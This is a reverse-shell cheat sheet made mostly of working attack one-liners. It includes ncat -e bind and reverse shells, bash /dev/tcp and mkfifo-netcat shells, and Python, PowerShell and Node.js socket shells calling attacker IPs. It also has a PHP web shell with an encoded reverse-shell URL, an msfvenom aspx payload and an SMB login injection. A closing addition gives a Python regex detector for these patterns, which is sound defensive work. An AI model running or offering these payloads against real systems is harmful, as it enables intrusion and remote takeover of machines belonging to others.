Start a backdoor shell on the victim machine
# ncat -l -p 1337 -e "/bin/bash -i"
Connect to the backdoor
# ncat 192.168.2.6 1337
Listen for a reverse shell (on the attacker's machine)
# ncat -l -p 23
Start the shell on the victim and hand control to the attacker (reverse shell)
# ncat -e "/bin/bash -i" 192.168.2.7 23
Start the shell on the victim and hand control to the attacker, Bash only (reverse shell)
bash -i &>/dev/tcp/192.168.2.7/23 0>&1
bash -c "bash -i &>/dev/tcp/192.168.2.7/23 0>&1"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.15 5555 >/tmp/f #alternative
Create a reverse shell in Python
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.223",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); pty.spawn("/bin/bash")'
Windows web shell
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Get a better shell (interactive shell with echo)
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
reset
xterm-256color
export TERM=xterm
export SHELL=bash
Create an aspx shell for Windows IIS
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.15 LPORT=4444 --platform windows -a x64 -f aspx -o shell.aspx
Turning an SMB shell into a reverse shell
# smbclient -U "username%password" //192.168.0.6/mo_partage
# smb> login "/=nc '192.168.0.222' 4444 -e /bin/bash"
Shell in PHP
nc -nlvp 1234 # on the attacker
<?php system($_GET['cmd']); ?> // shell.php
http://192.168.2.22/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.2.64%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
Shell in Node.js
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4242, "10.0.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
Get a better shell (interactive shell)
python -c 'import pty; pty.spawn("/bin/bash")'
socat file:`tty`,raw,echo=0 tcp-listen:4444 # attacker
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 # victim
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
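Detection side, as an added example (not part of the original cheat sheet): the one-liners above share a small set of command-line markers, which a defender can match in process-creation or web access logs. The rule names, the log line layout and the sample records are assumptions made for this example; the regexes are heuristics and will miss obfuscated variants.

```python
import re
from urllib.parse import unquote

# Markers drawn from the one-liners on this page; rule names are labels chosen for this example.
RULES = [
    ("netcat-exec", re.compile(r"\bn(?:cat|c)\b.*\s-e\s")),
    ("bash-dev-tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("fifo-netcat", re.compile(r"\bmkfifo\b.*\|\s*nc\b")),
    ("python-socket-dup2", re.compile(r"python[0-9.]*\s+-c\b.*socket\.socket.*os\.dup2")),
    ("python-pty-spawn", re.compile(r"pty\.spawn\(")),
    ("powershell-tcpclient", re.compile(r"System\.Net\.Sockets\.TCPClient.*\biex\b", re.I)),
    ("socat-exec-pty", re.compile(r"\bsocat\b.*\bexec:.*\bpty\b")),
]

def scan(line):
    """Return the names of all rules that match one log line."""
    decoded = unquote(line)  # web access logs carry the command URL-encoded
    return [name for name, rx in RULES if rx.search(decoded)]

# Constructed sample records (not real telemetry); addresses are documentation ranges.
SAMPLES = [
    'host=web01 cmd=ncat -e "/bin/bash -i" 192.0.2.7 23',
    'host=web01 cmd=bash -c "bash -i &>/dev/tcp/192.0.2.7/23 0>&1"',
    'host=web01 cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.7 5555 >/tmp/f',
    'GET /shell.php?cmd=python3%20-c%20%27import%20socket,os;s=socket.socket();os.dup2(s.fileno(),0)%27 HTTP/1.1',
    'host=db02 cmd=nc -zv 192.0.2.10 443',
    'host=db02 cmd=python3 -c "import json,sys; print(json.load(sys.stdin))"',
]

def report(lines):
    """Map each flagged line to its matching rule names; clean lines are omitted."""
    return {line: hits for line in lines if (hits := scan(line))}

if __name__ == "__main__":
    for line, hits in report(SAMPLES).items():
        print(", ".join(hits), "<-", line)
```

The last two samples are ordinary administrative commands and are left unflagged, which is the property to re-check whenever a rule is loosened.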